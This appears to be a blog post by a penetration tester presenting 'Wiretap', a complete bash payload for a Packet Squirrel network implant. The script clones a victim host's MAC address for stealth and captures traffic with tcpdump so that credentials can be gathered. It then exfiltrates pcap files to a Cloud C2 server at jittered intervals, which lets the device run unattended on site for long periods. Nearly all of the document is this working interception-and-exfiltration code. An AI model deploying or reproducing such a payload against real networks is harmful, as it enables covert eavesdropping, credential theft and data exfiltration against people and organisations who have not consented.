The Packet Squirrel is a great network implant that can be used for a variety of purposes. One of the most common uses is to sniff network traffic to pcap. This is a great way to gather credentials, identify hosts, domain controllers, protocols in use and perform lots of other network reconnaissance and packet analysis. However the default tcpdump payload requires manual retrieval of the implanted Packet Squirrel from the target site to recover the pcaps.
This is obviously not ideal during a physical penetration test as you must re enter the site to recover the device which makes it rather useless as a long haul implant. To solve this problem I wrote a payload that will automatically exfiltrate a set number of pcap files to Cloud C2 at a given interval. The pcaps are archived, compressed, saved to USB and rotated after each round of exfiltration. This allows the Packet Squirrel to be deployed and left on site for long periods of time without the need to re enter the site to recover the device.
All you need to do is set the sleep interval and number of pcaps to exfiltrate, modify the default jitter values if you prefer something shorter, copy the payload to the switch1 folder and the device will do the rest. The NETMODE has also been set to CLONE which clones the MAC address of the MITM’d host from the ethernet in (eth0) port and spoofs it on the ethernet out (eth1) port.
Pseudo Code Flow Diagram
payload.sh
#!/bin/bash
#
# Title: Wiretap
# Description: Sets the NETMODE to CLONE for opsec, sniffs traffic,
# and exfiltrates a set number of PCAPs to Cloud C2 at a given interval.
# PCAPs are archived and rotated after each round of exfiltration.
# Author: Shain Lakin
# Version: 1.0
# Category: sniffing, exfiltration
# Target: Any
# Net Mode: CLONE
# LED loop: LEDs are off by default, uncomment for debugging
# Solid Yellow; tcpdump running
# Flashing Magenta; exfiltrating pcap
# Flashing Red; killing tcpdump
# White Solid; archiving pcaps and sleeping
interval=3600
num_exfils=100
mode=CLONE
jitter=$((30 + RANDOM % 600))
function rotate() {
#LED W SOLID
mkdir -p /mnt/loot/archive &>/dev/null
tar -czf /mnt/loot/archive/archive-$fname.tar.gz \
/mnt/loot/tcpdump/ &>/dev/null
rm /mnt/loot/tcpdump/dump*
sleep $(($interval + $jitter))
}
function finish() {
#LED R FAST
kill $1
wait $1
sync
sleep 1
}
function sniff() {
fname=dump_$(date +%Y-%m-%d-%H-%M).pcap
mkdir -p /mnt/loot/tcpdump &>/dev/null
tcpdump -i eth0 -w /mnt/loot/tcpdump/$fname -C 2 -z sync &>/dev/null &
tpid=$!
sleep 5
c=0
while true
do
#LED ATTACK
LED OFF
if [[ $c -eq 0 ]]
then
while [[ $(ls -al /mnt/loot/tcpdump/$fname \
| awk '{print $5}') -lt 2000000 ]]; do sleep 1;done
else
while [[ $(ls -al /mnt/loot/tcpdump/$fname$c \
| awk '{print $5}') -lt 2000000 ]]; do sleep 1;done
fi
if [[ $c -eq 0 ]]
then
sync
sleep $((10 + RANDOM % 30))
#LED M SUCCESS
C2EXFIL /mnt/loot/tcpdump/$fname
else
sync
sleep $((5 + RANDOM % 10))
#LED M SUCCESS
C2EXFIL /mnt/loot/tcpdump/$fname$c
fi
((c++))
if [[ $c -eq $num_exfils ]]
then
finish $tpid
rotate $fname
sniff
else
continue
fi
done
}
[[ ! -f /mnt/NO_MOUNT ]] && {
NETMODE $mode
sleep 30
C2CONNECT
sniff
} || {
LED FAIL
}